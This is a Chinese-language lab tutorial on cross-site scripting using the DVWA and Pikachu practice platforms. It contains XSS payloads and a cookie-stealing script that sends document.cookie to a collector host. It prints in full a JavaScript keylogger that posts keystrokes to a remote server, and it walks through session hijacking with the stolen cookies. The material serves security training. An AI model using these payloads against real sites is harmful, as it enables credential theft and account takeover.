XSS
基本概念
跨站脚本攻击(Cross Site Scripting),简称 XSS(避免和 CSS 冲突),原理是接受了恶意脚本(输入),并在客户端执行了该恶意脚本(输出)。
分类
反射型
URL 上包含恶意脚本代码,受害者打开该 URL,恶意脚本代码被执行。
比如:http://YOUR_IP_ADDRESS:8080/vulnerabilities/xss_r/?name=world<script>console.log('world')</script>#
name
上包含了恶意脚本代码,当打开该链接,会在控制台输出 world
:
除了用
<script>
,我们还可以利用事件,比如<img>
加载图片失败时触发onerror
事件。🌰 举例,
<img src=## onerror="alert(document.cookie)" />
,将用户的 cookie 显示出来:
存储型
反射型不会被存储下来,接下来我们来看存储型的:
我们在 XSS(Stored)菜单项,注册 name
为 zhangsan
,message
为 🤡 <script>console.log('hello world')</script>
的 Guestbook。
现在无论任何用户访问 XSS(Stored)菜单项,都会执行该恶意脚本代码:
DOM 型
反射型的一种, 在客户端直接执行 DOM。
盲打
XSS 盲打,属于存储型的一种,攻击者并不知道恶意代码具体会在哪里执行。比如攻击者任意填写一个表单,但当后台管理人员打开表单管理,恶意代码被执行。
在 Pikachu 平台的 Cross-Site Scripting » XSS 之盲打菜单项下,攻击者提交恶意脚本代码:
当受害者登录后台:http://YOUR_IP_ADDRESS:8081/vul/xss/xssblind/admin_login.php
(账号密码为:admin/123456
)
可以看到我们的恶意脚本代码已经被执行了:
键盘记录
键盘记录是存储型的一种,将用户的键盘输入记录下来。
Pikachu 平台已经为我们提供了可用的键盘记录恶意脚本代码 /var/www/html/pkxss/rkeypress/rk.js
:
/**
* Created by runner on 2018/7/8.
*/
function createAjax(){
var request=false;
if(window.XMLHttpRequest){
request=new XMLHttpRequest();
if(request.overrideMimeType){
request.overrideMimeType("text/xml");
}
}else if(window.ActiveXObject){
var versions=['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++){
try{
request=new ActiveXObject(versions[i]);
if(request){
return request;
}
}catch(e){
request=false;
}
}
}
return request;
}
var ajax=null;
var xl="datax=";
function onkeypress() {
var realkey = String.fromCharCode(event.keyCode);
xl+=realkey;
show();
}
document.onkeypress = onkeypress;
function show() {
ajax = createAjax();
ajax.onreadystatechange = function () {
if (ajax.readyState == 4) {
if (ajax.status == 200) {
var data = ajax.responseText;
} else {
alert("页面请求失败");
}
}
}
var postdate = xl;
ajax.open("POST", "http://192.168.1.15/pkxss/rkeypress/rkserver.php",true);
ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
ajax.setRequestHeader("Content-length", postdate.length);
ajax.setRequestHeader("Connection", "close");
ajax.send(postdate);
在 54 行处,我们需要把 http://192.168.1.15/pkxss/rkeypress/rkserver.php
改为自己的 Pikachu 平台地址:
http://YOUR_IP_ADDRESS:PORT/pkxss/rkeypress/rkserver.php
,这个脚本是用于存储键盘输入。
然后写到:<script src="http://YOUR_IP_ADDRESS:PORT/pkxss/rkeypress/rk.js"></script>
然后进入 Pikachu 平台的 管理工具 » XSS 后台,然后查看「键盘记录」,现在只要存储型XSS 的留言板有键盘输入,就能够捕捉到:
平台利用
获取 Cookie
Pikachu 平台已经为我们提供了收集 Cookie 的脚本:<script>document.write('<img src="http://YOUR_IP_ADDRESS:PORT/pkxss/xcookie/cookie.php? cookie='+document.cookie+'"/>')</script>
模拟受害者登录后台,恶意代码被执行:
此时攻击者在后台看到 cookie 已经被收集上来了:
现在攻击者已经拿到 Cookie 了,那么就可以登录 Admin 端了,在另外的浏览器进入地址:http://YOUR_IP_ADDRESS:PORT/vul/xss/xssblind/admin_login.php
通过 Cookie Editor 这样的插件,攻击者把获取得到的 Cookie,包括 ant[pw]
, ant[uname]
,PHPSESSID
, security
填写上去:
接着在地址栏再输入 http://YOUR_IP_ADDRESS:PORT/vul/xss/xssblind/admin.php
,可以看到不会被重定向到 ../admin_login.php
页面了,而是直接登录成功
🧐 如何防范?
- 单点登录。一个账号只允许一个 IP 登录
- IP 记录。记录所有登录的 IP 地址。
BeEF
👉 安装见:02-MacOS M1M2 安装 Kali 和 BeEF 踩坑